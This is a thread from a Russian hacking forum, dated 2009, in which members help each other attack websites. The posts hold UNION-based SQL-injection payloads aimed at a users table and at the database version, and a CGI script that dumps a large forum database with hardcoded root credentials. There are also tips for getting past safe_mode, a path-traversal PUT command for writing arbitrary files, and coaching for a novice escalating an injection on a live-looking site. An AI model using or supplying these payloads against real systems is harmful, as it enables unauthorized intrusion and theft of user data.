20.11.2009, 17:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Емпти сет. Эта табличка пустая
999')+UNION+SELECT+1,count(*),3,4+from+users--+
Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
|
|
|
21.11.2009, 19:41
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.
Попробовал
PHP код:
#!/bin/sh
DB=forum
USER=root
PASS=motynub
HOST=localhost
echo "Content-Type: text/plain"
echo "Content-Disposition: attachment; filename=$DB.sql"
echo
mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB
Но вышел еррор 500 (safe_mode = ON)
Последний раз редактировалось Byrger; 21.11.2009 в 19:57..
|
|
|
|
22.11.2009, 15:08
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Сообщение от Byrger
Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.
Попробовал
PHP код:
#!/bin/sh
DB=forum
USER=root
PASS=motynub
HOST=localhost
echo "Content-Type: text/plain"
echo "Content-Disposition: attachment; filename=$DB.sql"
echo
mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB
Но вышел еррор 500 (safe_mode = ON) Попробуй запустить процесс в фоновом режиме, чтобы php не дожидался его завершения.
Вообще Sypex 2.0 может перезапускать себя для работы при safe_mode=on, проверь может ты старый использовал
|
|
|
|
20.11.2009, 17:26
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
|
|
|
|
20.11.2009, 17:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Spyder
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
__________________
Карфаген должен быть разрушен...
|
|
|
|
21.11.2009, 08:56
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от Spyder
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
|
|
|
|
21.11.2009, 10:24
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от p.r0phe.t
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду 
|
|
|
|
21.11.2009, 11:13
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от DrAssault
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду Ну да,скорее всего так и есть.
Но как подключиться к фтп на udp порту и какой синтаксис это команды?
NetCat ничего не выводит,хотя соединение не обрывает.
|
|
|
|
20.11.2009, 17:55
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу:
Код:
http://www.site.ru/vn84.php?id=’ OR ’1’=’1’
Выдает такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2
на сколько это серьезная ошибка и можно ли раскрутить это дальше ?
а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
|
|
|
|
20.11.2009, 18:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2B1t.exe
Код:
id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,version())+--+
мне кажется там можно замутить инклюд или читалку файлов
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1707342){kind=avatar}
Похожие темы
Комбинированный вид
